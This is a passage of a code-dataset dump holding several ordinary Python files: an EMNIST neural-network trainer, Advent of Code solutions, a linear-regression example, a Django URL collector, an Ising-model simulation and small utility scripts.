n_output_layer, xavier_init):\n \"\"\" Initialises weights depending on layer sizes and whether Xavier Initialisation is needed\n Reference: Takes inspiration from COM3240 Lab 2 - Matthew Ellis, 15/02/2021\n \"\"\"\n W1, W2, W3 = None, None, None\n \n if xavier_init: # Checks if Xavier initialisation is wanted\n # Initialises weights depending on number of layers present using:\n # Normally distributed random number * square_root(1 / number of input neurons to that layer)\n if n_hidden_layer > 0:\n W1 = np.random.randn(n_hidden_layer, n_input_layer) * np.sqrt(1 / (n_input_layer))\n\n if n_hidden_layer_2 > 0:\n W2 = np.random.randn(n_hidden_layer_2, n_hidden_layer) * np.sqrt(1 / (n_hidden_layer))\n W3 = np.random.randn(n_output_layer, n_hidden_layer_2) * np.sqrt(1 / (n_hidden_layer_2))\n\n else:\n W2 = np.random.randn(n_output_layer, n_hidden_layer) * np.sqrt(1 / (n_hidden_layer))\n\n else:\n W1 = np.random.randn(n_output_layer, n_input_layer) * np.sqrt(1 / (n_input_layer))\n\n else:\n # Weights are randomly picked from a uniform distribution between 0 and 1\n # They are normalized by making sure the weights sum to 1\n # Uses different configurations depending on number of layers required\n if n_hidden_layer > 0:\n W1 = np.random.uniform(0,1,(n_hidden_layer, n_input_layer))\n W1 = np.divide(W1,np.matlib.repmat(np.sum(W1,1)[:,None],1,n_input_layer))\n \n if n_hidden_layer_2 > 0:\n W2=np.random.uniform(0,1,(n_hidden_layer_2,n_hidden_layer))\n W2=np.divide(W2,np.matlib.repmat(np.sum(W2,1)[:,None],1,n_hidden_layer))\n\n W3=np.random.uniform(0,1,(n_output_layer,n_hidden_layer_2))\n W3=np.divide(W3,np.matlib.repmat(np.sum(W3,1)[:,None],1,n_hidden_layer_2))\n\n else:\n W2 = np.random.uniform(0,1,(n_output_layer, n_hidden_layer))\n W2 = np.divide(W2,np.matlib.repmat(np.sum(W2,1)[:,None],1,n_hidden_layer))\n\n else:\n W1 = np.random.randn(n_output_layer, n_input_layer) * np.sqrt(1 / (n_input_layer))\n\n return W1, W2, W3\n\n\n\ndef init_bias(n_hidden_layer, n_hidden_layer_2, n_output_layer):\n \"\"\" Initialises the bias weights (thresholds) for each neuron in each layer\"\"\"\n bias_W1, bias_W2, bias_W3 = None, None, None\n\n # Create empty arrays of the desired size given by the number of neurons per layer\n # Arrays are populated with 0's\n if n_hidden_layer > 0:\n bias_W1 = np.zeros((n_hidden_layer,1))\n\n if n_hidden_layer_2 > 0:\n bias_W2=np.zeros((n_hidden_layer_2,1)) \n bias_W3=np.zeros((n_output_layer,1))\n\n else:\n bias_W2 = np.zeros((n_output_layer,1))\n\n else:\n bias_W1 = np.zeros((n_output_layer,1))\n\n return bias_W1, bias_W2, bias_W3\n\n\n\n###########################\n# #\n# Training Metrics #\n# #\n###########################\ndef calculate_average_weight(tau, average_weight, average_weight_plot, prev_w1, w1, epoch):\n \"\"\" Calculates average change \"\"\"\n if epoch == 0:\n average_weight = w1 - prev_w1 # When Epoch = 0 using delta_w\n\n else:\n delta_w1 = w1 - prev_w1\n average_weight = (average_weight * (1 - tau)) + (tau * delta_w1)\n \n average_weight_plot[epoch] = np.sum(average_weight)\n print(\"Average weight: {}\".format(np.sum(average_weight)))\n return average_weight_plot, average_weight\n\n \n\ndef plot_results(data, xlabel, ylabel, title, legend):\n plt.plot(data, label=legend)\n plt.legend(loc=\"upper left\")\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.show()\n\n\n\n###########################\n# #\n# Training Model #\n# #\n###########################\ndef train(epoch, w1, w2, w3, samples, n_batches, bias_w1, bias_w2, bias_w3, n_hidden_layer, n_hidden_layer_2, \n batch_size, train_data, train_output, valid_data, valid_output, learning_rate, lmbda, l1):\n \"\"\" \n Trains the model based on the system parameters\n Uses the ReLU function and derivative to train neuron weights\n Weights are trained depending on the number of layers\n Batch training is carried out with weights being updated at the end of each bach\n After each epoch accuracy, error and average weight update (for single layer) are calculated\n At the end of training graphs are output for error, accuracy and average weight (single layer) per epoch\n \"\"\"\n # Initialise empty error and accuracy arrays\n errors = np.zeros((epoch,))\n accuracies = np.zeros((epoch,))\n\n # If it is only a single layer network initialise variables for calcualting average weight\n if (n_hidden_layer == 0) and (n_hidden_layer_2 == 0):\n tau = 0.01\n average_weight = np.zeros(w1.shape)\n average_weight_plot = np.zeros((epoch,1))\n prev_w1 = np.copy(w1)\n\n # Epoch loop\n for i in range(epoch):\n # Build an array of shuffled indexes\n shuffled_indexes = np.random.permutation(samples)\n\n # Batch loop\n for batch in range(0, n_batches):\n \n # Initialise empty change in weight and bias depending on number of layers\n delta_w1 = np.zeros(w1.shape)\n delta_bias_w1 = np.zeros(bias_w1.shape)\n if n_hidden_layer > 0:\n delta_w2 = np.zeros(w2.shape)\n delta_bias_w2 = np.zeros(bias_w2.shape)\n if n_hidden_layer_2 > 0:\n delta_w3 = np.zeros(w3.shape)\n delta_bias_w3 = np.zeros(bias_w3.shape)\n\n # Extract indexes, and corresponding data from the input and expected output\n indexes = shuffled_indexes[batch*batch_size : (batch+1)*batch_size]\n x0 = train_data[indexes].T\n t = train_output[indexes].T\n\n # Apply input weights to summation of inputs and add bias terms\n h1 = np.matmul(w1, x0) + bias_w1\n # Apply the activation function to the summation\n x1 = relu(h1)\n \n # For first hidden layer\n if n_hidden_layer > 0:\n # Apply input weights to summation of inputs and add bias terms\n h2 = np.matmul(w2, x1) + bias_w2\n # Apply the activation function to the summation\n x2 = relu(h2)\n\n # For second hidden layer\n if n_hidden_layer_2 > 0:\n # Apply input weights to summation of inputs and add bias terms\n h3 = np.matmul(w3, x2) + bias_w3\n # Apply the activation function to the summation\n x3 = relu(h3)\n\n # Error signal\n error = t - x3\n # Local gradient for second hidden layer\n delta_3 = relu_prime(x3) * error\n # Change in weight at second hidden layer\n delta_w3 = (learning_rate / batch_size) * np.matmul(delta_3, x2.T)\n # Change in bias at second hidden layer\n delta_bias_w3 = (learning_rate / batch_size) * np.sum(delta_3, axis=1)\n # Reshape to be a matrix rather than column vector\n delta_bias_w3 = delta_bias_w3.reshape(-1, 1)\n\n # Local gradient for first hidden layer\n delta_2 = relu_prime(h2) * np.matmul(w3.T, delta_3)\n # Change in weight at first hidden layer\n delta_w2 = (learning_rate / batch_size) * np.matmul(delta_2, x1.T)\n # Change in bias at first hidden layer\n delta_bias_w2 = (learning_rate / batch_size) * np.sum(delta_2, axis=1)\n # Reshape to be a matrix rather than column vector\n delta_bias_w2 = delta_bias_w2.reshape(-1, 1)\n\n\n # Local gradient for input layer\n delta_1 = relu_prime(h1) * np.matmul(w2.T, delta_2)\n # Change in weight at input layer\n delta_w1 = (learning_rate / batch_size) * np.matmul(delta_1, x0.T)\n # Change in bias at input layer\n delta_bias_w1 = (learning_rate / batch_size) * np.sum(delta_1, axis=1)\n # Reshape to be a matrix rather than column vector \n delta_bias_w1 = delta_bias_w1.reshape(-1, 1)\n\n\n else:\n # Error signal\n error = t - x2\n # Change in weight at first hidden layer\n delta_2 = relu_prime(x2) * error\n # Change in weight at first hidden layer\n delta_w2 = (learning_rate / batch_size) * np.matmul(delta_2, x1.T)\n # Change in bias at first hidden layer\n delta_bias_w2 = (learning_rate / batch_size) * np.sum(delta_2, axis=1)\n # Reshape to be a matrix rather than column vector\n delta_bias_w2 = delta_bias_w2.reshape(-1, 1)\n\n # Local gradient for input layer\n delta_1 = relu_prime(h1) * np.matmul(w2.T, delta_2)\n # Change in weight at input layer\n delta_w1 = (learning_rate / batch_size) * np.matmul(delta_1, x0.T)\n # Change in bias at input layer\n delta_bias_w1 = (learning_rate / batch_size) * np.sum(delta_1, axis=1)\n # Reshape to be a matrix rather than column vector \n delta_bias_w1 = delta_bias_w1.reshape(-1, 1)\n\n else:\n # Error signal\n error = t - x1\n # Local gradient for input layer\n delta_1 = relu_prime(x1) * error\n # Change in weight at input layer\n delta_w1 = (learning_rate / batch_size) * np.matmul(delta_1, x0.T)\n # Change in bias at input layer\n delta_bias_w1 = (learning_rate / batch_size) * np.sum(delta_1, axis=1)\n # Reshape to be a matrix rather than column vector \n delta_bias_w1 = delta_bias_w1.reshape(-1, 1)\n\n # Checks if L1 error is used as well\n if l1:\n # Takes away the derivative of L1 from the change in weight\n delta_w1 -= (learning_rate / batch_size) * lmbda * np.sign(w1)\n # Takes away the derivative of L1 from the change in bias\n delta_bias_w1 -= (learning_rate / batch_size) * lmbda * np.sign(bias_w1)\n\n # Checks if hidden layer present\n if n_hidden_layer > 0:\n # Takes away the derivative of L1 from the change in weight\n delta_w2 -= (learning_rate / batch_size) * lmbda * np.sign(w2)\n # Takes away the derivative of L1 from the change in bias\n delta_bias_w2 -= (learning_rate / batch_size) * lmbda * np.sign(bias_w2)\n \n # Checks if second hidden layer present\n if n_hidden_layer_2 > 0:\n # Takes away the derivative of L1 from the change in weight\n delta_w3 -= (learning_rate / batch_size) * lmbda * np.sign(w3)\n # Takes away the derivative of L1 from the change in bias\n delta_bias_w3 -= (learning_rate / batch_size) * lmbda * np.sign(bias_w3)\n\n\n # Add change in weight\n w1 += delta_w1\n # Add change in bias\n bias_w1 += delta_bias_w1\n\n # Checks if hidden layer present\n if n_hidden_layer > 0:\n # Add change in weight\n w2 += delta_w2\n # Add change in bias\n bias_w2 += delta_bias_w2\n \n # Checks if second hidden layer present\n if n_hidden_layer_2 > 0:\n # Add change in weight\n w3 += delta_w3\n # Add change in bias\n bias_w3 += delta_bias_w3\n\n # Calculate and print average weight (single layer), accuracy and error at the end of the epoch\n print(\"------ Epoch {} ------\".format(i+1))\n if n_hidden_layer == 0:\n # If single layer present calculate average weight change\n average_weight_plot, average_weight = calculate_average_weight(tau, average_weight, average_weight_plot,\n prev_w1, w1, i)\n prev_w1 = np.copy(w1)\n # Calculate accuracy and error based on validation data\n accuracies[i], errors[i] = test(valid_data, valid_output, n_hidden_layer, n_hidden_layer_2, w1, w2, w3, \n bias_w1, bias_w2, bias_w3, l1, lmbda)\n print(\"---------------------\")\n print(\"\\n\")\n \n # Plot results for error, accruacy and average weight (single layer)\n #if n_hidden_layer == 0:\n # plot_results(average_weight_plot, 'Epoch', 'Average Weight Update Sum',\n # 'Average Weight Update Sum per Epoch', 'Average Weight Update Sum')\n #plot_results(errors, 'Epoch', 'Error', 'Error on Validation Set per Epoch', 'Error')\n #plot_results(accuracies, 'Epoch', 'Accuracy', 'Accuracy on Validation Set per Epoch', 'Accuracy')\n return w1, w2, w3, bias_w1, bias_w2, bias_w3\n\n\n\ndef test(test_data, test_output, n_hidden_layer, n_hidden_layer_2, w1, w2, w3, bias_w1, bias_w2, bias_w3, l1, lmbda):\n \"\"\" \n Predicts outputs depending on input data, trained weights and biases\n \"\"\"\n # Set up initial variables\n samples = test_data.shape[0]\n correct_values = np.argmax(test_output, axis=1)\n predicted_values = np.zeros((samples,))\n error = np.zeros(test_output.shape)\n error_l1 = 0\n\n # Extract inputs\n x0 = test_data.T\n\n # Apply input weights to summation of inputs and add bias terms\n h1 = np.matmul(w1, x0) + bias_w1\n # Apply the activation function to the summation\n x1 = relu(h1)\n\n # Checks if L1 is wanted\n if l1:\n # Calculates l1 error for input layer\n error_l1 = lmbda * np.sum(np.sqrt(np.square(w1)))\n\n # Checks if hidden layer is needed\n if n_hidden_layer > 0:\n # Apply input weights to summation of inputs and add bias terms\n h2 = np.matmul(w2, x1) + bias_w2\n # Apply the activation function to the summation\n x2 = relu(h2)\n if l1:\n # Calculates l1 error for hidden layer\n error_l1 += lmbda * np.sum(np.sqrt(np.square(w2)))\n\n if n_hidden_layer_2 > 0:\n # Apply input weights to summation of inputs and add bias terms\n h3 = np.matmul(w3, x2) + bias_w3\n # Apply the activation function to the summation\n x3 = relu(h3)\n if l1:\n # Calculates l1 error for second hidden layer\n error_l1 += lmbda * np.sum(np.sqrt(np.square(w3)))\n\n # Calculate labels\n predicted_values = np.argmax(x3, axis=0)\n # Error Signal\n error = (test_output - x3.T)\n\n else:\n # Calculate labels\n predicted_values = np.argmax(x2, axis=0)\n # Error Signal\n error = (test_output - x2.T)\n\n else:\n # Calculate labels\n predicted_values = np.argmax(x1, axis=0)\n # Error Signal\n error = (test_output - x1.T)\n\n # Calculate MSE error\n error_mse = np.sum(np.square(error)) / (2 * error.shape[0])\n\n # Add MSE error to L1 error, if L1 isn't used this will add 0\n error = error_mse + error_l1\n\n # Calculate accuracy of predictions\n accuracy = (np.sum(predicted_values == correct_values) / samples) * 100\n\n print(\"Accuracy = \", accuracy)\n print(\"Error = \", error)\n return accuracy, error\n\n\n\ndef main():\n # Load the EMNIST dataset\n train_images, train_labels, test_images, test_labels, validation_images, validation_labels = load_data('emnist-letters-1k.mat')\n\n # Systems Variables\n NO_LABELS = 26\n EPOCH = 250\n LAMBDA = 0.00001 \n BATCH_SIZE = 50\n SAMPLES = train_images.shape[0]\n IMAGE_SIZE = train_images.shape[1]\n N_BATCHES = int(math.ceil(SAMPLES / BATCH_SIZE))\n LEARNING_RATE = 0.05\n XAVIER_INIT = True # Boolean, determines if XAVIER_INIT is used\n L1_ERROR = True # Boolean, determines if L1 Error is used\n\n # Number of neurons in each layer\n # For the hidden layers 0 means the layer doesn't exist\n N_INPUT_LAYER = IMAGE_SIZE\n N_HIDDEN_LAYER = 100\n N_HIDDEN_LAYER_2 = 20\n N_OUTPUT_LAYER = NO_LABELS\n\n # Turns labels into expected output of output layer\n test_output = init_expected_outputs(test_labels)\n train_output = init_expected_outputs(train_labels)\n validation_output = init_expected_outputs(validation_labels)\n\n # Initialises weights before training\n w1, w2, w3 = init_weights(N_INPUT_LAYER, N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, N_OUTPUT_LAYER, XAVIER_INIT)\n # Initialises Bias terms\n bias_w1, bias_w2, bias_w3 = init_bias(N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, N_OUTPUT_LAYER)\n\n # Trains model and returns weights and bias terms\n w1, w2, w3, bias_w1, bias_w2, bias_w3 = train(EPOCH, w1, w2, w3, SAMPLES, N_BATCHES, bias_w1, bias_w2, bias_w3,\n N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, BATCH_SIZE, train_images, \n train_output, validation_images, validation_output, LEARNING_RATE,\n LAMBDA, L1_ERROR)\n\n # Tests data based on system parameters and trained model, prints accuracy and error\n print(\"------ Test Data ------\")\n test(test_images, test_output, N_HIDDEN_LAYER, N_HIDDEN_LAYER_2, w1, w2, w3, bias_w1, \n bias_w2, bias_w3, L1_ERROR, LAMBDA)\n print(\"-----------------------\")\n print(\"\\n\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"612380368","text":"from pickle import load\nfrom sys import argv\nfrom time import sleep\n\nimport Processor\nimport snake\n\nif len(argv) != 2:\n print(\"Please give me a program to run\")\n exit(1)\n\nfile = open(argv[1], 'rb')\nprogram, register_count, input_count, instruction_set = load(file)\n\nProcessor_Class = {'simple': Processor.SimpleProcessor, 'complex': Processor.Processor}[instruction_set]\n\nprogram_runner = Processor_Class(register_count=register_count,\n input_count=input_count,\n output_count=4)\nprogram_runner.set_program(program)\n\nprogram_runner.print_program()\n\nwhile True:\n score = snake.run(True, program_runner)\n print(\"Score: {}\".format(score))\n sleep(1)","sub_path":"Genetic/runProgram.py","file_name":"runProgram.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"325530935","text":"\ndef parche(doc):\n\tparche=doc[\"version\"]\n\treturn parche\ndef disponibles(doc):\n\tnum=len(doc[\"data\"])\n\treturn num\ndef campeones(doc):\n\tlistacampeones=[]\n\tfor elem in doc[\"data\"]:\n\t\tlistacampeones.append(elem)\n\treturn listacampeones\n\ndef descripciones(campeon,doc):\n\tfor elem in doc[\"data\"]:\n\t\tif elem == campeon:\n\t\t\tdescripcion=doc[\"data\"][campeon][\"blurb\"]\n\treturn descripcion\n\ndef stats(campeon,doc):\n\tfor elem in doc[\"data\"]:\n\t\tif elem == campeon:\n\t\t\testadisticas=doc[\"data\"][campeon][\"stats\"]\n\treturn estadisticas\n\t\ndef busqueda(buscar,doc):\n\tlistacampeones=[]\n\tfor elem in doc[\"data\"]:\n\t\tif elem.startswith(buscar):\n\t\t\tlistacampeones.append(elem)\n\treturn listacampeones\n\ndef roles(rol,doc):\n\tlistacampeones=[]\n\tfor elem in doc[\"data\"].values():\n\t\tif rol in elem[\"tags\"]:\n\t\t\tcampeon={}\n\t\t\tcampeon[\"nombre\"]=elem[\"name\"]\n\t\t\tcampeon[\"titulo\"]=elem[\"title\"]\n\t\t\tlistacampeones.append(campeon)\n\treturn listacampeones","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"131783622","text":"track = []\nfor line in open(\"Day13Input.txt\"):\n if line: # Create a 2D list with rows and columns\n track.append([char for char in line])\n\n# Up: item 0 Right: item 1 Down: item 2 Left: item 3\ndirectionsRow = [-1, 0, 1, 0]\ndirectionsColumn = [0, 1, 0, -1]\n\n\ndef turnleft(direction):\n return (direction + 3) % 4\n\n\ndef turnright(direction):\n return(direction + 1) % 4\n\n\nclass Cart(object):\n def __init__(self, row, column, direction, intersection):\n self.row = row # Cart's row (y value)\n self.column = column # Cart's column (x value)\n self.direction = direction\n self.intersection = intersection\n\n\n# Identify and add carts\ncarts = []\nfor r in range(len(track)): # For every row in the track\n for c in range(len(track[r])): # For every column in the track\n if track[r][c] == '^': # If there is a cart going upwards\n track[r][c] = '|' # Replace it with a vertical track\n carts.append(Cart(r, c, 0, 0)) # Add it to the carts list\n elif track[r][c] == '>': # If there is a cart going right\n track[r][c] = '-' # Replace it with a horizontal track\n carts.append(Cart(r, c, 1, 0)) # Add it to the carts list\n elif track[r][c] == 'v': # If there is a cart going upwards\n track[r][c] = '|' # Replace it with a vertical track\n carts.append(Cart(r, c, 2, 0)) # Add it to the carts list\n elif track[r][c] == '<': # If there is a cart going left\n track[r][c] = '-' # Replace it with a horizontal track\n carts.append(Cart(r, c, 3, 0)) # Add it to the carts list\n\nwhile len(carts) > 1: # While there are more than one cart left\n # Resort the carts (using lambda to sort by row THEN column)\n carts = sorted(carts, key=lambda cart: (cart.row, cart.column))\n for cart in carts: # Loop through all carts\n newRow = cart.row + directionsRow[cart.direction] # Work out next row move for cart\n newColumn = cart.column + directionsColumn[cart.direction] # Work out next column move for cart\n if track[newRow][newColumn] == '\\\\': # If the next move is on a left turn ('\\\\' used to ignore escape chars)\n # If the cart is going up into turn, turn left\n # If it is going right into this turn, turn downwards\n # If it is going down into this turn, turn right\n # If it is going left into this turn, turn upwards\n cart.direction = {0: 3, 1: 2, 2: 1, 3: 0}[cart.direction]\n elif track[newRow][newColumn] == '/': # If the next move is on a right turn\n cart.direction = {0: 1, 1: 0, 2: 3, 3: 2}[cart.direction] # Change direction accordingly\n elif track[newRow][newColumn] == '+': # If the next move is on an intersection\n if cart.intersection == 0: # And if the cart is on its 1st out of 3 intersections\n cart.direction = turnleft(cart.direction) # Turn the cart left\n elif cart.intersection == 1: # If the cart is on its 2nd out of 3 intersections\n pass # Do nothing\n elif cart.intersection == 2: # If the cart is on its 3rd out of 3 intersections\n cart.direction = turnright(cart.direction) # Turn the cart left\n cart.intersection = (cart.intersection + 1) % 3 # Ensure the intersections always stays out of 3\n if (newRow, newColumn) in [(other.row, other.column) for other in carts]: # If another cart is already there\n carts = [other for other in carts if (other.row, other.column) not in\n [(cart.row, cart.column), (newRow, newColumn)]] # Remove both carts from carts list\n print(newColumn, newRow) # Print where the collision happened\n # Finally, end the tick and set the cart's row + column to their new values\n cart.row = newRow\n cart.column = newColumn\n\nprint(\"Final cart: \" + str(carts[0].column) + \", \" + str(carts[0].row)) # Print last remaining cart","sub_path":"AdventOfCode2018/Day13/Day13Part2.py","file_name":"Day13Part2.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"644965327","text":"# Librerias\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\n# Importo el dataset\ndataset = pd.read_csv('./ejercicios/regresion-lineal/Salary_Data.csv')\nx = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, -1].values\n\n# Separar conjunto de entrenamiento y testing\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\n\n# Crear el modelo de regresion lineal\nfrom sklearn.linear_model import LinearRegression\nregresion = LinearRegression()\nregresion.fit(x_train, y_train)\n\n# Predecir el conjunto de testing\ny_predic = regresion.predict(x_test)\n\n# Graficar los resultados\nplt.scatter(x_test, y_test, color=\"red\")\nplt.plot(x_test, y_predic, color=\"blue\")\nplt.title(\"Sueldo vs Años de experiencia\")\nplt.xlabel(\"Años de experiencia\")\nplt.ylabel(\"Sueldo $\")\nplt.show()\n","sub_path":"ejercicios/regresion-lineal/plantilla.py","file_name":"plantilla.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"580622837","text":"\n\ndef get_instructions(instructions):\n for char in instructions:\n yield char\n\ndef process_instruction(loc, instruction):\n x,y = loc\n if instruction == '>':\n x += 1\n elif instruction == '<':\n x -= 1\n elif instruction == '^':\n y += 1\n elif instruction == 'v':\n y -= 1\n return x,y\n\nwith open('inputs/day3.txt','r') as fid:\n data = fid.read().splitlines()[0]\n\ndelivered_houses = {}\nloc = (0,0)\nfor instruction in get_instructions(data):\n loc = process_instruction(loc, instruction)\n delivered_houses[loc] = delivered_houses.get(loc,0) + 1\nnum_houses = len(delivered_houses)\nprint(f\"Part 1: Number of houses with >= 1 present = {num_houses}\")\n\n\n\ndelivered_houses = {}\nsanta_loc = (0,0)\nrobo_santa_loc = (0,0)\ninstr_gen = get_instructions(data)\nwhile True:\n try:\n santa_loc = process_instruction(santa_loc, next(instr_gen))\n delivered_houses[santa_loc] = delivered_houses.get(santa_loc,0) + 1\n except StopIteration:\n break\n try:\n robo_santa_loc = process_instruction(robo_santa_loc, next(instr_gen))\n delivered_houses[robo_santa_loc] = delivered_houses.get(robo_santa_loc,0) + 1\n except StopIteration:\n break\n\nnum_houses = len(delivered_houses)\nprint(f\"Part 2: Number of houses with >= 1 present = {num_houses}\")\n","sub_path":"2015/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"440846803","text":"from django.utils.module_loading import import_string\r\nfrom django.urls.resolvers import URLResolver, URLPattern\r\nfrom django.conf import settings\r\nimport re\r\ndef recursion_urls( pre_url, urlpatterns, url_list):\r\n \"\"\"\r\n 递归的去获取URL\r\n :param per_namespace: namespace前缀,以后用户拼接name\r\n :param per_url: url前缀,以后用于拼接url\r\n :param urlpatterns: 路由关系列表\r\n :param url_ordered_dict: 用于保存递归中获取的所有路由\r\n :return:\r\n \"\"\"\r\n for item in urlpatterns:\r\n if re.match('admin/', str(item.pattern)):\r\n continue\r\n if isinstance(item, URLPattern): # 非路由分发\r\n url = pre_url + str(item.pattern).replace('^', '',1)\r\n url_list.append(url)\r\n elif isinstance(item, URLResolver):\r\n recursion_urls( pre_url + str(item.pattern), item.url_patterns, url_list)\r\n\r\ndef get_all_url_list():\r\n \"\"\"\r\n 获取项目中所有的URL\r\n :return:\r\n \"\"\"\r\n url_list = []\r\n md = import_string(settings.ROOT_URLCONF)\r\n recursion_urls('/', md.urlpatterns, url_list) # 递归去获取所有的路由\r\n return url_list\r\n\r\ndef check_current_url(churrent_url):\r\n all_url = get_all_url_list()\r\n for url in all_url:\r\n\r\n if re.match(url, churrent_url):\r\n print(url, churrent_url)\r\n return url\r\n\r\n return False","sub_path":"apps/rbac/middleware/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"456545967","text":"import os\nchoice = 0\nfilename = ''\n\ndef menu():\n global choice\n print ('Menu\\n 1.open Calculator\\n 2.Open Notepad\\n 3.Exit')\n choice = input('Select Menu : ')\n\ndef opennotepad():\n filename = 'C:Windows\\System32\\\\notepad.exe'\n print('Memorandum writing %s'%filename)\n os.system(filename)\n\nwhile True:\n menu()\n if choice == '1':\n opennotepad()\n break \n","sub_path":"another/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"172675377","text":"'''\ncheck the global_config category is networkService\n@author YeTian 2018-09-20\n'''\n\nimport zstackwoodpecker.test_util as test_util\nimport test_stub\nimport zstackwoodpecker.test_lib as test_lib\nimport zstackwoodpecker.operations.config_operations as conf_ops\n\ndef test():\n\n global deft_networkService_1\n global deft_networkService_2\n global deft_networkService_3\n global deft_networkService_4\n #get the default value\n deft_networkService_1 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.l2VlanNetwork')\n deft_networkService_2 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.dummyNetwork')\n deft_networkService_3 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.l2VxlanNetwork')\n deft_networkService_4 = conf_ops.get_global_config_default_value('networkService', 'defaultDhcpMtu.l2NoVlanNetwork')\n\n\n # change the default value\n\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VlanNetwork', '1000')\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.dummyNetwork', '1000')\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VxlanNetwork', '1000')\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2NoVlanNetwork', '1000')\n\n\n # restore defaults\n\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VlanNetwork', '%s' % deft_networkService_1)\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.dummyNetwork', '%s' % deft_networkService_2)\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2VxlanNetwork', '%s' % deft_networkService_3)\n conf_ops.change_global_config('networkService', 'defaultDhcpMtu.l2NoVlanNetwork', '%s' % deft_networkService_4)\n\n\n#Will be called only if exception happens in test().\ndef error_cleanup():\n global deft_networkService_1\n\n","sub_path":"integrationtest/vm/simulator/config/test_config_category_networkservice.py","file_name":"test_config_category_networkservice.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"91863438","text":"import random\nimport numpy as np\nfrom scipy import signal\nfrom annealing import B_anneal, T_anneal\n\ntry:\n __IPYTHON__\nexcept:\n from tqdm import tqdm\n\ndef run_ising(N,T,num_steps,num_burnin,flip_prop,J,B,disable_tqdm=False):\n\n # Description of parameters:\n # N = Grid Size\n # T = Temperature (normalized to k_B = 1)\n # num_steps = Number of steps to run in total (including burnin steps)\n # num_burnin = Number of steps to use for the burnin process. This isn't\n #\tused in this code but you might need it if you change this to try and\n #\tget better convergence.\n # J = Interaction strength\n # B = Applied magnetic field\n # flip_prop = Total ratio of spins to possibly flip per step\n\n # Initialize variables\n M,E = 0,0 # Magnetization and Energy Initial Values\n Msamp, Esamp = [],[] #Arrays to hold magnetization and energy values\n\n # We obtain the sum of nearest neighbors by convoluting\n # this matrix with the spin matrix\n conv_mat = np.matrix('0 1 0; 1 0 1; 0 1 0')\n\n # Generate a random initial configuration\n spin = np.random.choice([-1,1],(N,N))\n\n try:\n __IPYTHON__\n steps = range(num_steps)\n except:\n if disable_tqdm:\n steps = range(num_steps)\n else:\n steps = tqdm(range(num_steps))\n\n # Evolve the system\n for step in steps:\n\n try:\n __IPYTHON__\n except:\n if disable_tqdm:\n pass\n else:\n steps.set_description(\"Working on T = %.2f\" % T)\n steps.refresh() # to show immediately the update\n\n #implement annealing in annealing.py file\n T_step = T_anneal(T, step, num_steps, num_burnin)\n B_step = B_anneal(B, step, num_steps, num_burnin)\n\n #Calculating the total spin of neighbouring cells\n neighbors = signal.convolve2d(spin,conv_mat,mode='same',boundary='wrap')\n\n #Sum up our variables of interest, normalize by N^2\n M = float(np.sum(spin))/float(N**2)\n Msamp.append(M)\n\n #Divide by two because of double counting\n E = float(-J*(np.sum((spin*neighbors)))/2.0)/float(N**2) - float(B_step)*M\n Esamp.append(E)\n\n #Calculate the change in energy of flipping a spin\n DeltaE = 2.0 * (J*(spin*neighbors) + float(B_step)*spin)\n\n #Calculate the transition\n p_trans = np.where(DeltaE >= 0.0, np.exp(-1.0*DeltaE/float(T_step)),1.0)\n #If DeltaE is positive, calculate the Boltzman flipping probability.\n #If not, assign a transition probability of 1\n\n #Decide which transitions will occur\n transitions = [[-1 if (cell>random.random() and flip_prop>random.random()) else 1 for cell in row] for row in p_trans]\n #Perform the transitions\n spin = spin*transitions\n\n return Msamp, Esamp, spin\n","sub_path":"python/ising.py","file_name":"ising.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"366467929","text":"# -*- coding: utf-8 -*-\n\"\"\"\nÉditeur de Spyder\n\nCeci est un script temporaire.\n\"\"\"\n\ndef mul(vector):\n a = 1\n for i in range(len(vector)):\n a = a*vector[i]\n print(a)\n\n#mul([1, 5, 9])","sub_path":"exercices/328/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} 